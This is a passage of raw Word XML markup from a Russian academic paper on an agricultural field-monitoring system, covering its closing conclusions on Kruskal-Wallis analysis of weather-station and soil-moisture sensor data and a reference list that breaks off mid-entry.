        <w:t>При исследовании алгоритмов обработки данных для дисперсионного анализа были</w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t xml:space="preserve"> использованы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> непараметрические методы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Крускала</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-Уоллеса, так как они позволяют проводить дисперсионный анализ при нарушении аксиомы о нормальности распределения входных данных и одинаковой дисперсии у групп.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09E6B4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r>
        <w:t>Созданная система позволяет успешно визуализировать и анализировать данные автоматической цифровой метеостанции и датчиков-влагомеров в реальном времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E47131" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:r>
        <w:t>Выбранные средства разработки позволяют в полной мере реализовать функционал системы мониторинга данных сельскохозяйственного поля с возможностью проведения статистических исследований.</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD72A90" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc161568220"/>
      <w:bookmarkStart w:id="52" w:name="_Toc162709247"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="089A961B" w14:textId="77777777" w:rsidR="00E258B2" w:rsidRDefault="00E258B2" w:rsidP="00E258B2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Блохин Ю.И., Белов А.В., Блохина С.Ю. БЕСПРОВОДНАЯ ГИБРИДНАЯ СЕТЬ С ПОДДЕРЖКОЙ ИНТЕРНЕТА ВЕЩЕЙ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOT</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3376">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ДЛЯ МОНИТОРИНГА ПОСЕВСОВ СЕЛЬСКОХОЗЯЙСТВЕННЫХ КУЛЬТУР / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Биологизация</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> землепользования: почва, технологии, продукция. Материалы международной научно-практической конференции. Москва, 2023. С. 328-333.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58888DE8" w14:textId="02AAE374" w:rsidR="0093378B" w:rsidRPr="006830F2" w:rsidRDefault="0093378B" w:rsidP="006830F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Полуэктов Р.А., Смоляр Э.И., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Терлеев</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> В.В., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Топаж</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> А.Г. Модели продукционного процесса сельскохозяйственных культур </w:t>
      </w:r>
      <w:r w:rsidRPr="006830F2">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> СПб: Изд-во С.-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Петерб</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. ун-та, 2006. – 396с. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ISBN</w:t>
      </w:r>
      <w:r w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> 5-288-03836-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17999E77" w14:textId="3A1BB512" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Шеффе</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Г. Дисперсионный Анализ / Наука. Главная редакция физико-математической литературы, 1980. – 512с.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE58D7" w14:textId="2D585830" w:rsidR="00C625A2" w:rsidRPr="00C625A2" w:rsidRDefault="00C625A2" w:rsidP="00C625A2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sir Ronald A. Fisher. The Design of Experiments / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hanfer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Press, 1971. – 248</w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60F7B2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">«Чистая» и прикладная математика. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t>): [</w:t>
      </w:r>
      <w:r>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">]. – </w:t>
      </w:r>
      <w:r>
        <w:t>Санкт</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Петербург, 2015. – Текст: электронный. – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>function</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>statistics</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dispersion</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>analysis</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97DD1">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>дата обращения: 17.03.2024</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97DD1">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B57E8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kruskal W.H., Wallis W.A. Use Ranks in One-Criterion Variance Analysis / Journal of American Statistical Association, 1952. – 583-621</w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://dx.doi.org/10.1080/01621459.1952.10483441</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18383D05" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> J.H. Biostatistical Analysis / Prentice Hall, 1999. – 663</w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4089A535" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007429B9">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SPSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">]. – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Амстердам, 2023. – Текст: электронный. – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wikipedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wiki</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SPSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>дата обращения: 17.03.2024</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93CB86" w14:textId="3FA9BF8D" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C62EC9">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Statistical</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]. – </w:t>
      </w:r>
      <w:r>
        <w:t>Окленд</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2024. – </w:t>
      </w:r>
      <w:r>
        <w:t>Текст</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62EC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: https://www.r-project.org/. </w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>дата обращения: 17.03.2024</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E26603B" w14:textId="061F9CA4" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aniche</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> M. et al. Code smells for model-view-controller architectures //Empirical Software Engineering. – 2018. – </w:t>
      </w:r>
      <w:r>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. 23. – </w:t>
      </w:r>
      <w:r>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. 2121-2157.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9021E" w14:textId="4C3A840F" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Esbai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> R., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erramdani</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> M., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mbarki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> S. Model-driven transformation for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with approach by modeling: From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> model to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications //International </w:t>
      </w:r>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Review on Computers and Software (I. RE. CO. S.). – 2014. – Т. 9. – №. 9. – С. 1612-1620.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE92364" w14:textId="35B96566" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Feldman S. A Conversation with Alan Kay: Big talk with the creator of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smalltalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-and much more //Queue. – 2004. – Т. 2. – №. 9. – С. 20-30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473D013" w14:textId="1425CA24" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
